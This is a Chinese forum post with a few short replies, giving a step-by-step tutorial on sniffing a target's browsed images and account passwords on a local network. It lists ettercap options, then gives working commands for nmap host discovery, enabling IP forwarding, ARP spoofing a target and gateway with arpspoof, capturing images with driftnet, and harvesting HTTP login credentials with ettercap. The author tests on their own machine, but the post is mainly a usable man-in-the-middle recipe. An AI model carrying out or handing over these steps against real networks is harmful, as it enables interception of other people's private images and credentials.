admin 发表于 2020-7-5 10:00:09

Ettercap嗅探目标浏览的图片和账号密码

ettercap:最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析,总之可以简单理解为可以抓取数据包。driftnet :一款简单的图片捕获工具,可以很方便的在网络数据包中抓取图片。
1.Ettercap



ettercap:最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析,总之可以简单理解为可以抓取数据包。driftnet :一款简单的图片捕获工具,可以很方便的在网络数据包中抓取图片。


2.基础语法
-T 文本模式
-G 图形模式
-D 守护进程-M中间人
-B双网卡之间进行欺骗
-M arp
-M icmp:(MAC/IP)
-M dhcp:(ip_pool/netmask/dns)-r 读取本地文件
-w 将嗅探数据保存到本地ettercap -Tq -i eth0    //这条命令表示监控eth0网卡的流量driftnet -i wlan0    //捕获经过eth0的图片并显示-i 网卡,后接网卡名3.实验复现一,首先扫描局域网所有的ip:输入ifconfig获取自己的网卡和ip信息用nmap探测局域网下的主机。命令:nmap -sP 192.168.1.0/24//-sP后面根据自己网络填网段

本机IP:192.168.1.106

这里我们用本机作为目标进行嗅探。


二,Arp欺骗目标主机

注意:linux中默认不开启IP转发不转发的话目标机就没网,我们去手动开启他,去修改配置文件/proc/sys/net/ipv4的ip_forward中,默认为0(不转发),我们修改成1。


输入:
echo 1 >/proc/sys/net/ipv4/ip_forward    //这句意思是向这个文件写入1设置回来:echo 0 >/proc/sys/net/ipv4/ip_forward
接着我们输入:

arpspoof -i eth0 -t 192.168.1.106 192.168.1.1   //-i后面是网卡,-t 后面填目标ip最后的填网关
我们开启了ip转发,目标ip不会断网。

三,用driftnet捕获图形


重新打开一个终端输入:
driftnet -i eth0 //这句话的意思是捕获eth0上的数据

driftnet弹出了一个窗口,是显示捕获的图片用的,我们用当前电脑去看看图片。

我们去qq空间看了一下照片,我们现在去看看kali。

我们可以看到已经成功捕获到。
我们关掉driftnet窗口,留下arp欺骗终端我们去测试账号密码获取。

四,ettercap获取账号密码


重新打开一个终端输入:
ettercap -Tq -i eth0
我们找一个http(https有防劫持)的网站去注册一个号

我们去kali看看

已经成功嗅探到了我们刚刚注册的号的信息

4.实验结束

教程到此结束,有疑惑的话可以在论坛留言,或者进入QQ群讨论。

XEXN 发表于 2020-7-5 22:47:08

观摩 :D

q6317161 发表于 2020-7-10 19:25:03

看看:)

Jtripper 发表于 2020-10-15 18:06:02

个人尝试后发现会有杀毒软件,在没有特殊方法的情况下不能穿透啊

kaa 发表于 2020-10-30 20:51:47

揣磨揣摩:):)

kaa 发表于 2020-10-30 20:52:04

:victory:

林天毅 发表于 2022-7-20 09:58:48

看看

nihaota 发表于 2022-10-31 02:08:42

好好好好好好好好好好好好好好好好好顶
页: [1]
查看完整版本: Ettercap嗅探目标浏览的图片和账号密码